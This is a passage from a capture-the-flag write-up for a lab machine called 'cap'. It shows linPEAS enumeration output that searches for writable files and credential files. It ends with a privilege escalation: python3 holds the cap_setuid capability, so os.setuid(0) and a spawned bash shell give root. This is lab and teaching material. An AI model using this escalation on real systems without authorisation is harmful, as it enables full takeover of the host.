/var/www/html/static/js/vendor
/var/www/html/static/js/vendor/jquery-2.2.4.min.js
/var/www/html/static/js/vendor/modernizr-2.8.3.min.js
/var/www/html/static/js/bootstrap.min.js
/var/www/html/static/js/jquery.slicknav.min.js
/var/www/html/static/js/pie-chart.js
/var/www/html/static/js/line-chart.js
/var/www/html/static/js/popper.min.js
/var/www/html/static/js/owl.carousel.min.js
/var/www/html/static/js/maps.js
/var/www/html/static/css
/var/www/html/static/css/bootstrap.min.css
/var/www/html/static/css/typography.css
/var/www/html/static/css/default-css.css
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
-rw-r--r-- 1 root root 9935 May 15 2021 0.pcap
-rw-r--r-- 1 root root 19985 May 20 2021 index.html
-rw-r--r-- 1 tcpdump tcpdump 24 Apr 7 03:25 3.pcap
-rw-r--r-- 1 tcpdump tcpdump 24 Apr 7 04:00 1.pcap
-rw-r--r-- 1 tcpdump tcpdump 846 Apr 7 04:00 2.pcap
drwxr-xr-x 2 root root 4096 May 23 2021 css
drwxr-xr-x 2 root root 4096 May 23 2021 fonts
drwxr-xr-x 3 root root 4096 May 23 2021 js
drwxr-xr-x 9 root root 4096 May 23 2021 images
total 16
total 20
total 24
╔══════════╣ Readable files belonging to root and readable by me but not world readable
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/nathan
/run/lock
/run/screen
/run/user/1001
/run/user/1001/dbus-1
/run/user/1001/dbus-1/services
/run/user/1001/gnupg
/run/user/1001/inaccessible
/run/user/1001/systemd
/run/user/1001/systemd/transient
/run/user/1001/systemd/units
/snap/core18/2066/tmp
/snap/core18/2066/var/tmp
/snap/core18/2074/tmp
/snap/core18/2074/var/tmp
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
#)You_can_write_even_more_files_inside_last_directory
/var/crash
/var/tmp
/var/www/html
/var/www/html/__pycache__
/var/www/html/__pycache__/app.cpython-38.pyc
/var/www/html/app.py
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
╚═════════════════════════╝
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
/usr/bin/rescan-scsi-bus.sh
╔══════════╣ Executable files potentially added by user (limit 70)
2021-05-15+21:40:28.2491426570 /usr/local/bin/gunicorn
2021-05-15+21:40:28.2011395020 /usr/local/bin/flask
2020-09-23+18:59:04.5286646640 /etc/console-setup/cached_setup_terminal.sh
2020-09-23+18:59:04.5286646640 /etc/console-setup/cached_setup_keyboard.sh
2020-09-23+18:59:04.5286646640 /etc/console-setup/cached_setup_font.sh
╔══════════╣ Unexpected in root
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/home/nathan/.gnupg/pubring.kbx
/home/nathan/.gnupg/trustdb.gpg
/home/nathan/snap/lxd/common/config/config.yml
/var/log/syslog
/var/log/journal/06774f23bd654b25a296a616308d2acd/user-1001.journal
/var/log/journal/06774f23bd654b25a296a616308d2acd/system.journal
/var/log/kern.log
/var/log/auth.log
╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation
logrotate 3.14.0
Default mail command: /usr/bin/mail
Default compress command: /bin/gzip
Default uncompress command: /bin/gunzip
Default compress extension: .gz
Default state file path: /var/lib/logrotate/status
ACL support: yes
SELinux support: yes
╔══════════╣ Files inside /home/nathan (limit 20)
total 36
drwxr-xr-x 5 nathan nathan 4096 Apr 7 05:08 .
drwxr-xr-x 3 root root 4096 May 23 2021 ..
lrwxrwxrwx 1 root root 9 May 15 2021 .bash_history -> /dev/null
-rw-r--r-- 1 nathan nathan 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 nathan nathan 3771 Feb 25 2020 .bashrc
drwx------ 2 nathan nathan 4096 May 23 2021 .cache
drwx------ 3 nathan nathan 4096 Apr 7 05:08 .gnupg
-rw-r--r-- 1 nathan nathan 807 Feb 25 2020 .profile
lrwxrwxrwx 1 root root 9 May 27 2021 .viminfo -> /dev/null
drwxr-xr-x 3 nathan nathan 4096 Apr 7 05:07 snap
-r-------- 1 nathan nathan 33 Apr 7 02:17 user.txt
╔══════════╣ Files inside others home (limit 20)
/var/www/html/app.py
/var/www/html/templates/index.html
/var/www/html/__pycache__/app.cpython-38.pyc
/var/www/html/upload/0.pcap
/var/www/html/upload/1.pcap
/var/www/html/upload/2.pcap
/var/www/html/upload/3.pcap
/var/www/html/static/js/plugins.js
/var/www/html/static/js/scripts.js
/var/www/html/static/js/bar-chart.js
/var/www/html/static/js/metisMenu.min.js
/var/www/html/static/js/jquery.slimscroll.min.js
/var/www/html/static/js/vendor/jquery-2.2.4.min.js
/var/www/html/static/js/vendor/modernizr-2.8.3.min.js
/var/www/html/static/js/bootstrap.min.js
/var/www/html/static/js/jquery.slicknav.min.js
/var/www/html/static/js/pie-chart.js
/var/www/html/static/js/line-chart.js
/var/www/html/static/js/popper.min.js
/var/www/html/static/js/owl.carousel.min.js
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 2756 Feb 13 2020 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 11886 May 23 2021 /usr/share/info/dir.old
-rw-r--r-- 1 root root 392817 Feb 9 2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README.old.gz
-rwxr-xr-x 1 root root 226 Feb 17 2020 /usr/share/byobu/desktop/byobu.desktop.old
-rwxr-xr-x 1 root root 1086 Nov 25 2019 /usr/src/linux-headers-5.4.0-80/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 0 Apr 14 2021 /usr/src/linux-headers-5.4.0-73-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 0 Apr 14 2021 /usr/src/linux-headers-5.4.0-73-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 237862 Apr 14 2021 /usr/src/linux-headers-5.4.0-73-generic/.config.old
-rw-r--r-- 1 root root 0 Jul 9 2021 /usr/src/linux-headers-5.4.0-80-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 0 Jul 9 2021 /usr/src/linux-headers-5.4.0-80-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 237862 Jul 9 2021 /usr/src/linux-headers-5.4.0-80-generic/.config.old
-rwxr-xr-x 1 root root 1086 Nov 25 2019 /usr/src/linux-headers-5.4.0-73/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 1403 May 23 2021 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-38.pyc
-rw-r--r-- 1 root root 1775 Feb 25 2021 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py
-rw-r--r-- 1 root root 9833 Jul 9 2021 /usr/lib/modules/5.4.0-80-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 9073 Jul 9 2021 /usr/lib/modules/5.4.0-80-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9833 Apr 14 2021 /usr/lib/modules/5.4.0-73-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 9073 Apr 14 2021 /usr/lib/modules/5.4.0-73-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 44048 Mar 17 2021 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 2743 Jul 31 2020 /etc/apt/sources.list.curtin.old
-rw-r--r-- 1 root root 678 Apr 7 02:16 /run/blkid/blkid.tab.old
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/www/html/static/images/icon/Thumbs.db: Composite Document File V2 Document, Cannot read section info
Found /var/www/html/static/images/icon/market-value/Thumbs.db: Composite Document File V2 Document, Cannot read section info
-> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
-> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)
-> Extracting tables from /var/lib/fwupd/pending.db (limit 20)
╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K May 23 2021 .
drwxr-xr-x 14 root root 4.0K May 23 2021 ..
drwxr-xr-x 6 nathan nathan 4.0K May 25 2021 html
/var/www/html:
total 32K
drwxr-xr-x 6 nathan nathan 4.0K May 25 2021 .
drwxr-xr-x 3 root root 4.0K May 23 2021 ..
╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 nathan nathan 220 Feb 25 2020 /home/nathan/.bash_logout
-rw-r--r-- 1 landscape landscape 0 Jul 31 2020 /var/lib/landscape/.cleanup.user
-rw-r--r-- 1 root root 220 Feb 25 2020 /etc/skel/.bash_logout
-rw------- 1 root root 0 Jul 31 2020 /etc/.pwd.lock
-rw------- 1 root root 0 Apr 7 02:16 /run/snapd/lock/.lock
-rw-r--r-- 1 root root 0 Apr 7 02:16 /run/network/.ifstate.lock
-rw------- 1 root root 0 May 7 2021 /snap/core18/2066/etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr 4 2018 /snap/core18/2066/etc/skel/.bash_logout
-rw------- 1 root root 0 Jun 11 2021 /snap/core18/2074/etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr 4 2018 /snap/core18/2074/etc/skel/.bash_logout
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 root root 51200 May 23 2021 /var/backups/alternatives.tar.0
╔══════════╣ Searching passwords in history files
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
#)There are more creds/passwds files in the previous parent folder
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/keyring/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/tests/__pycache__/test_credential_store.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/tests/test_credential_store.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-plymouth.path
/usr/lib/systemd/system/systemd-ask-password-plymouth.service
#)There are more creds/passwds files in the previous parent folder
/usr/share/doc/git/contrib/credential
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
Binary file /var/log/journal/06774f23bd654b25a296a616308d2acd/user-1001.journal matches
[ 35.061721] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
[ 36.188414] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r'
nathan@cap:~$From the output that we executed, I saw the cap_setuid is available, in this case we can get the root by set the uid into 0
Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+epLet’s do this in python,
nathan@cap:~$ python3
Python 3.8.5 (default, Jan 27 2021, 15:41:15)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.system("/bin/bash")
root@cap:~#
root@cap:~# ls /root
root.txt
root@cap:~# cat /root/root.txt
REDACTEDWe successfully set uid into 0 and enter as a root user, we also get the root flag stored in /root/root.txt
Source:
https://portswigger.net/web-security/access-control/idor
https://github.com/peass-ng/PEASS-ng/releases
https://precli.readthedocs.io/…/os-setuid-root/